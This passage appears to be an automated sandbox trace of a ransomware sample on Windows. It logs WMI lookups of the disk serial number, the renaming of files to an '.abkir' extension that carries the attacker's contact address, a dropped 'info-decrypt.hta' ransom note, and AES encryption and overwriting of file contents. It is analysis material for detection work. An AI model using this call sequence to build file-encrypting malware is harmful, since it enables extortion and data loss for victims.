[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6023d20) returned 0x0 [0197.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6023d20, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0197.957] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023d20, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6027910) returned 0x0 [0197.957] WbemLocator:IUnknown:Release (This=0x6023d20) returned 0x0 [0197.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6027910) returned 0x0 [0197.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0197.957] WbemLocator:IUnknown:AddRef (This=0x6027910) returned 0x3 [0197.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0197.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0197.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0197.957] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0197.957] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0197.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0197.957] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x2 [0197.957] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x1 [0197.957] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0197.957] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0197.957] WbemLocator:IUnknown:QueryInterface (in: This=0x6027910, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6027910) returned 0x0 [0197.957] WbemLocator:IUnknown:AddRef (This=0x6027910) returned 0x3 [0197.957] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x2 [0197.957] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0197.957] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0197.957] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.957] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6027920) returned 0x0 [0197.958] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027920, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x60335dc) returned 0x0 [0198.448] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b5e4) returned 0x0 [0198.449] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b5e4, pProxy=0x60335dc, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0198.449] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x1 [0198.449] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b604) returned 0x0 [0198.449] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b5e4) returned 0x0 [0198.449] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b5e4, pProxy=0x60335dc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0198.449] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x2 [0198.449] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0198.449] CoTaskMemFree (pv=0xb59088) [0198.449] WbemLocator:IUnknown:Release (This=0x6027920) returned 0x0 [0198.449] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b604) returned 0x0 [0198.449] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0198.450] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0198.450] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0198.450] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0198.450] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0198.450] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5b564) returned 0x0 [0198.450] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b564, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.450] WbemLocator:IUnknown:Release (This=0xb5b564) returned 0x3 [0198.450] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0198.450] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0198.450] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b5ec) returned 0x0 [0198.450] WbemLocator:IRpcOptions:Query (in: This=0xb5b5ec, pPrx=0xb5b604, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0198.450] WbemLocator:IUnknown:Release (This=0xb5b5ec) returned 0x3 [0198.450] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0198.451] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0198.451] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0198.451] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x60335dc) returned 0x0 [0198.451] WbemLocator:IUnknown:AddRef (This=0x60335dc) returned 0x4 [0198.451] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x3 [0198.451] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x2 [0198.451] SysStringLen (param_1=0x0) returned 0x0 [0198.451] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0198.451] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0198.451] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.451] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0198.451] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0198.451] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b604) returned 0x0 [0198.451] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x3 [0198.451] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0198.451] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0198.451] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.451] IWbemServices:GetObject (in: This=0x60335dc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6028180, ppCallResult=0x0) returned 0x0 [0198.644] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0198.644] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0198.644] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.644] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x365b0c4*=0, plFlavor=0x365b0c8*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x365b0c4*=8, plFlavor=0x365b0c8*=0) returned 0x0 [0198.644] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.644] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.644] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x365b0c4*=8, plFlavor=0x365b0c8*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x365b0c4*=8, plFlavor=0x365b0c8*=0) returned 0x0 [0198.644] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.644] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.644] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0198.644] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x72 [0198.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0198.644] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2f6c3500, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0198.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0198.645] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0198.647] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0198.647] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0198.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0198.647] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e3b8500, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x2e3b8500, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x2e3b8500, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0198.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0198.647] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0198.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0198.648] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), fInfoLevelId=0x0, lpFileInformation=0x365b764 | out: lpFileInformation=0x365b764*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4)) returned 1 [0198.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0198.648] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0198.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0198.648] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0198.648] GetFileType (hFile=0x31c) returned 0x1 [0198.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0198.648] GetFileType (hFile=0x31c) returned 0x1 [0198.648] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x97f3f4 [0198.674] ReadFile (in: hFile=0x31c, lpBuffer=0x7ed5b70, nNumberOfBytesToRead=0x97f3f4, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x7ed5b70*, lpNumberOfBytesRead=0x6c0f4ec*=0x97f3f4, lpOverlapped=0x0) returned 1 [0200.535] CloseHandle (hObject=0x31c) returned 1 [0200.536] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbdf838) returned 1 [0200.537] CryptGenRandom (in: hProv=0xbdf838, dwLen=0x10, pbBuffer=0x377b1b0 | out: pbBuffer=0x377b1b0) returned 1 [0200.709] CryptImportKey (in: hProv=0xbdf838, pbData=0x367d0b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f4d0) returned 1 [0200.709] CryptContextAddRef (hProv=0xbdf838, pdwReserved=0x0, dwFlags=0x0) returned 1 [0200.709] CryptContextAddRef (hProv=0xbdf838, pdwReserved=0x0, dwFlags=0x0) returned 1 [0200.709] CryptDuplicateKey (in: hKey=0xb7f4d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f1d0) returned 1 [0200.709] CryptContextAddRef (hProv=0xbdf838, pdwReserved=0x0, dwFlags=0x0) returned 1 [0200.709] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x4, pbData=0x367d190*=0x1, dwFlags=0x0) returned 1 [0200.710] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x1, pbData=0x367d15c, dwFlags=0x0) returned 1 [0200.746] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x98a1038*, pdwDataLen=0x6c0f4b8*=0x97f400, dwBufLen=0x97f400 | out: pbData=0x98a1038*, pdwDataLen=0x6c0f4b8*=0x97f400) returned 1 [0200.834] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x367d1b8*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x367d1b8*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0200.835] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0200.835] CryptReleaseContext (hProv=0xbdf838, dwFlags=0x0) returned 1 [0200.835] CryptReleaseContext (hProv=0xbdf838, dwFlags=0x0) returned 1 [0200.835] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0200.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0200.836] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0200.842] GetFileType (hFile=0x31c) returned 0x1 [0200.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0200.842] GetFileType (hFile=0x31c) returned 0x1 [0200.842] WriteFile (in: hFile=0x31c, lpBuffer=0x367d7dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x367d7dc*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0200.843] CloseHandle (hObject=0x31c) returned 1 [0200.843] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0200.843] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0200.843] CoTaskMemFree (pv=0xbed438) [0200.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0200.843] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0200.844] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0200.844] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, 